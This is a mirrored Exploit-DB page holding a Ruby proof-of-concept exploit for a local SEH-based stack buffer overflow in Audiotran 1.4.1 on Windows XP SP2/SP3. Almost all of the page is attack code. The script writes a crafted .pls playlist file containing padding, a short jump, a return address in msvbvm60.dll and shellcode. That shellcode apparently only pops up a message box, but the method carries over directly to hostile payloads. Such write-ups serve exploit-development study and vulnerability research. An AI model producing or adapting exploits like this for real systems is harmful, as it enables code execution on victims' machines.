Audiotran 1.4.1 (Windows XP SP2/SP3 English) – Local Buffer Overflow

• Exploit Database
• 8 阅读

• 作者： Sébastien Duquette
  日期： 2010-01-10
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/11079/

• #!/usr/bin/ruby
  #
  # Exploit Title : Audiotran 1.4.1 Win XP SP2/SP3 English Buffer Overflow
  # Date: January 9th, 2010
  # Author: Sébastien Duquette
  # Software Link : http://www.e-soft.co.uk/Audiotran.htm
  # Version : 1.4.1
  # OS: Windows
  # Tested on : XP SP2/SP3 En (VMware)
  # Type of vuln: Stack Overflow / SEH
  # Greetz to : Corelan Team::corelanc0d3r/EdiStrosar/Rick2600/MarkoT/mr_me
  #
  # Script provided 'as is', without any warranty.
  # Use for educational purposes only.
  #
  #
  #
  
  banner =
  "|------------------------------------------------------------------|\n" +
  "| __ __|\n" +
  "| _________________/ /___ _____ / /________ _____ ___|\n" +
  "|/ ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n" +
  "| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / |\n" +
  "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/|\n" +
  "||\n" +
  "| http://www.corelan.be:8800 |\n" +
  "||\n" +
  "|-------------------------------------------------[ EIP Hunters ]--|\n\n"
  
  # Corelan Team MsgBox
  payload =
  "\xeb\x22\x56\x31\xc0\x64\x8b\x40\x30\x85\xc0\x78" +
  "\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\xeb" +
  "\x09\x8b\x40\x34\x8d\x40\x7c\x8b\x40\x3c\x5e\xc3" +
  "\xeb\x69\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54" +
  "\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb" +
  "\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0" +
  "\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb" +
  "\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x01\xeb" +
  "\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b" +
  "\x01\xe8\x89\x44\x24\x1c\x61\xc3\xad\x50\x52\xe8" +
  "\xaa\xff\xff\xff\x89\x07\x44\x44\x44\x44\x44\x44" +
  "\x44\x44\x47\x47\x47\x47\x39\xce\x75\xe6\xc3\x4c" +
  "\x4c\x4c\x4c\x89\xe5\xe8\x68\xff\xff\xff\x89\xc2" +
  "\xeb\x1c\x5e\x8d\x7d\x04\x89\xf1\x80\xc1\x0c\xe8" +
  "\xc8\xff\xff\xff\xeb\x15\x31\xd2\x59\x88\x51\x36" +
  "\x51\x52\xff\x54\x24\x0c\xe8\xdf\xff\xff\xff\x57" +
  "\x7f\x29\x62\xe8\xe6\xff\xff\xff\x43\x6f\x72\x65" +
  "\x6c\x61\x6e\x20\x54\x65\x61\x6d\x20\x53\x68\x65" +
  "\x6c\x6c\x63\x6f\x64\x65\x20\x2d\x20\x50\x72\x6f" +
  "\x67\x72\x61\x6d\x20\x65\x78\x70\x6c\x6f\x69\x74" +
  "\x65\x64\x20\x73\x75\x63\x65\x73\x73\x66\x75\x6c" +
  "\x6c\x79\x58"
  
  print banner
  puts "[+] Exploit for Audiotran 1.4.1."
  
  filename = "audiotran_poc.pls"
  f = File.new(filename, 'w')
  f.write 'A' * 1308 #padding
  f.write "\xeb\x06\x90\x90"
  f.write "\xcb\x75\x52\x73" # ret at 0x735275CB [msvbvm60.dll]
  f.write payload
  f.write 'A' * 9000 # padding
  f.close
  
  puts "[+] Wrote exploit file : #{filename}."